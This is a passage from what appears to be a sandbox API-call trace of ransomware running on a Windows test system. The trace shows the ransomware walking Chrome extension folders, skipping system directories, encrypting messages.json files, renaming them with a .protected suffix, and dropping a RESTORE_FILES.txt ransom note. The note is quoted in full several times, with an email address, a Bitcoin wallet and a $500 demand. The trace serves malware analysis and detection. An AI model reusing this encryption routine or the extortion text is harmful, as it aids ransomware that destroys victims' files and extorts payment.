data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.protected")) returned 1 [0078.961] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.961] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.961] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\RESTORE_FILES.txt") returned 159 [0078.961] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0078.962] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.962] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.962] lstrlenA (lpString="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") returned 684 [0078.962] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.963] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.963] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.963] CloseHandle (hObject=0x164) returned 1 [0078.963] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.963] lstrcmpiW (lpString1="es_419", lpString2="Windows") returned -1 [0078.963] lstrcmpiW (lpString1="es_419", lpString2="Program Files") returned -1 [0078.963] lstrcmpiW (lpString1="es_419", lpString2="Program Files (x86)") returned -1 [0078.963] lstrcmpiW (lpString1="es_419", lpString2="$Recycle.bin") returned 1 [0078.963] lstrcmpiW (lpString1="es_419", lpString2="System Volume Information") returned -1 [0078.963] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419") returned 145 [0078.963] lstrcmpW (lpString1="es_419", lpString2=".") returned 1 [0078.963] lstrcmpW (lpString1="es_419", lpString2="..") returned 1 [0078.963] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\*") returned 147 [0078.963] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.963] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.963] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.964] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.964] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.964] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.964] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\.") returned 147 [0078.964] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.964] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.964] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.964] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.964] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.964] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.964] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.964] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\..") returned 148 [0078.964] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.964] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.964] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.964] lstrcmpiW (lpString1="messages.json", lpString2="Windows") 
returned -1 [0078.964] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.964] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.964] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.964] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.964] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json") returned 159 [0078.964] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.964] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.964] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.964] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json") returned 159 [0078.965] StrStrW (lpFirst="messages.json", lpSrch=".txt") 
returned 0x0 [0078.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json") returned 159 [0078.965] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json") returned 159 [0078.965] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.965] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0078.966] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.966] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0078.966] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.966] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.967] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.967] CloseHandle (hObject=0x168) returned 1 [0078.967] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.protected") returned 169 [0078.967] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.protected")) returned 1 [0078.967] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.967] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.967] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\RESTORE_FILES.txt") returned 163 [0078.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.968] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.968] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.968] lstrlenA (lpString="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") returned 684 [0078.968] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.969] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.969] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.969] CloseHandle (hObject=0x164) returned 1 [0078.969] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.969] lstrcmpiW (lpString1="et", lpString2="Windows") returned -1 [0078.969] lstrcmpiW (lpString1="et", lpString2="Program Files") returned -1 [0078.969] lstrcmpiW (lpString1="et", lpString2="Program Files (x86)") returned -1 [0078.969] lstrcmpiW (lpString1="et", lpString2="$Recycle.bin") returned 1 [0078.969] lstrcmpiW (lpString1="et", lpString2="System Volume Information") returned -1 [0078.969] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et") returned 141 [0078.969] lstrcmpW (lpString1="et", lpString2=".") returned 1 [0078.969] lstrcmpW (lpString1="et", lpString2="..") returned 1 [0078.969] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\*") returned 143 [0078.969] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.969] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.969] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.969] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.969] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.969] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.969] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\.") returned 143 [0078.969] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.969] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.969] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.969] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.969] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.969] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.969] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.970] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\..") returned 144 [0078.970] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.970] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.970] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.970] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0078.970] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.970] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.970] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.970] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.970] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json") returned 155 [0078.970] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.970] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.970] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.970] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json") returned 155 [0078.970] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.970] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json") returned 155 [0078.970] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json") returned 155 [0078.970] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.970] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0078.971] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.971] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0078.971] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.971] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.971] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.972] CloseHandle (hObject=0x168) returned 1 [0078.972] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.protected") returned 165 [0078.972] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.protected")) returned 1 [0078.972] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.972] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.972] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\RESTORE_FILES.txt") returned 159 [0078.972] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0078.972] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.972] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.973] lstrlenA 
